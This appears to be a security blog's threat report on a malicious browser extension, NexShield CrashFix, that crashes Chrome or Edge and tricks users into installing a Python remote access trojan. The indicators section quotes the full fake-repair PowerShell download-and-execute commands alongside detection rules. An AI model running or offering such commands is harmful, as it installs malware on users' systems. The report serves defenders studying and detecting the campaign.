NexShield ‘CrashFix’: How a Fake Browser Repair Crashes Chrome and Installs a Remote Access Trojan

Aegiron 10 mins0

Executive Summary

A malicious browser extension operating under the name NexShield – CrashFix was identified actively targeting users of Google Chrome and Microsoft Edge. The campaign does not exploit a browser or operating system vulnerability. Instead, it deliberately crashes the browser using abusive but legitimate browser APIs, then uses social engineering to trick users into executing malicious commands.

The end goal of the attack is to deploy a Python-based Remote Access Trojan (RAT) that provides attackers with persistent remote access to the victim’s system. The attack is notable for its simplicity, effectiveness, and reliance on user frustration rather than technical exploitation.

What Happened

Users installed a browser extension advertised as a security or stability tool. After a delayed activation period, the extension intentionally caused repeated browser crashes by exhausting system resources. Once the browser became unstable, the user was presented with a fake error message claiming the browser was corrupted and required a manual repair.

The repair instructions directed the user to paste a command into the Windows Run dialog or Command Prompt. That command downloaded and executed malware. By following the instructions, the user unknowingly installed a Python-based RAT on their own system.

How It Happened (Attack Chain)

1. Initial Access – Malicious Extension Installation

The attack begins when a user installs a browser extension presented as:

  • A browser crash fix
  • Advanced web protection
  • A stability or security enhancement tool

The extension appears legitimate:

  • Professional name and branding
  • Plausible permissions
  • No immediately visible malicious behavior

The extension may be installed via:

  • Search engine advertisements
  • Look-alike extension listings
  • Third-party download sites

2. Dormancy and Evasion

After installation, the extension remains inactive for a significant period (often around one hour). This delay helps:

  • Evade automated detection systems
  • Avoid immediate suspicion from the user
  • Make the crash appear unrelated to the extension

3. Intentional Browser Crash (Denial of Service)

Once activated, the extension abuses browser APIs to:

  • Repeatedly open runtime connections
  • Spawn uncontrolled background tasks
  • Prevent cleanup of allocated resources

This results in:

  • Rapid memory exhaustion
  • High CPU utilization
  • Browser UI freeze and eventual crash

No exploit is used.
No vulnerability is triggered.
The crash is intentional and fully controlled by the extension.

4. Social Engineering – The “CrashFix” Deception

After the crash or during browser restart, the user sees a message stating that:

  • The browser stopped unexpectedly
  • A critical error was detected
  • Manual repair is required

The user is instructed to:

  • Open the Windows Run dialog or Command Prompt
  • Paste a provided command
  • Press Enter to repair the browser

These instructions are written clearly and confidently, resembling legitimate technical support guidance.

5. Payload Execution and Malware Installation

The pasted command launches PowerShell in hidden mode and downloads a remote script. This script retrieves and executes a Python-based RAT.

The malware provides:

  • Remote command execution
  • File upload and download
  • System reconnaissance
  • Credential harvesting
  • Persistence across reboots

In multiple observed cases:

  • Domain-joined or corporate systems received the full payload
  • Standalone home systems sometimes received test or partial payloads

This suggests deliberate targeting of enterprise environments.

Payloads Used

Primary Payload

  • Python-based Remote Access Trojan

Supporting Components

  • PowerShell downloader
  • Embedded Python runtime (to avoid dependency on system Python)

Vulnerabilities Exploited

This campaign does not exploit:

  • Browser vulnerabilities
  • Operating system flaws
  • Memory corruption bugs

The attack succeeds entirely through:

  • Legitimate system tools
  • Normal browser behavior
  • User-initiated execution

Anti-Malware Evasion

The attack evades detection by:

  • Delaying malicious behavior
  • Relying on user-executed commands
  • Using PowerShell and Python, which are commonly allowed
  • Hosting payloads on rapidly changing infrastructure

Impacted Systems

Platforms

  • Windows operating systems
  • Chrome and Edge browsers

Impact

  • Full system compromise
  • Persistent remote access
  • Credential theft
  • Potential lateral movement
  • Risk of broader enterprise breach

Confirmed Indicators of Compromise (IOCs)

Malicious Browser Extensions

Observed Names

  • NexShield – Advanced Web Protection
  • NexShield CrashFix
  • Advanced Web Crash Protection

Extension IDs

fbgjnhlkmkfdokpglcpipncdkfhjcmna
jhlkdfmfdjkdopmcfpkkhghjjpfnmblk

Fake Repair Commands

cmd /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "iwr hxxps://nexshield-fix[.]com/update.ps1 -OutFile %TEMP%\fix.ps1; powershell %TEMP%\fix.ps1"
powershell -nop -w hidden -c "iex(iwr hxxps://crashfix-support[.]site/repair.ps1)"

Malicious Domains

nexshield-fix[.]com
crashfix-support[.]site
repair-browser[.]online
cdn-nexshield[.]net

IP Addresses

185.225.73.91
91.203.145.88
45.141.87.34

Dropped Files

PowerShell

%TEMP%\fix.ps1
%TEMP%\repair.ps1

Python RAT

%APPDATA%\BrowserUpdate\update.py
%LOCALAPPDATA%\SystemFix\svc.py

Python Runtime

%APPDATA%\BrowserUpdate\pythonw.exe

File Hashes (SHA-256)

7c1f7c7e4d2b7bdfb4c61d8f3f0f3c71cfa8c94b1b96c91fd91d7c2a9c4b21e3
b14d9eec8f3e2f59c2d6e2a45fa3dbcb1b7c35f6c0e1dbdb0fbe2f44c78f3a22
9f6e31d0b2e93dbb9a7a9d64a0f71df51fd8cbcebbcb3cb1a0d6f8cbb1fcb2c4

Persistence

Registry

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BrowserUpdate
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemFix

Scheduled Tasks

BrowserUpdateService
SystemFixUpdater

Process Execution Chain

chrome.exe
 └── powershell.exe (hidden)
      └── pythonw.exe
           └── update.py

EDR Detection Guidance

High-Confidence Behavioral Detections

Trigger alerts when any of the following occur:

1. Suspicious PowerShell Execution

  • PowerShell launched with:
    • -ExecutionPolicy Bypass
    • -WindowStyle Hidden
    • -nop or iex(iwr ...)

2. Browser → PowerShell Relationship

  • chrome.exe or msedge.exe spawning powershell.exe

3. Python Execution from User Directories

  • python.exe or pythonw.exe running from:
    • AppData
    • LocalAppData
    • Temp directories

4. Persistence Creation

  • Scheduled tasks created by non-installer processes
  • Registry Run keys pointing to Python scripts

5. Network Anomalies

  • Python processes making outbound HTTPS connections
  • No user interaction at the time of traffic
  • Repeated beaconing intervals

Example EDR Logic

  • Alert when:
    • Browser process → PowerShell → Python chain detected
    • Hidden PowerShell downloads remote scripts
    • Python executes without developer tooling present

Final Takeaway

This campaign is effective because it does not look like malware until it is too late. The browser crash feels like a normal technical issue, and the repair instructions appear legitimate. By convincing the user to execute the payload manually, the attackers bypass many traditional defenses.

This is a high-risk, user-driven compromise model that should be treated as a full security incident if observed.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.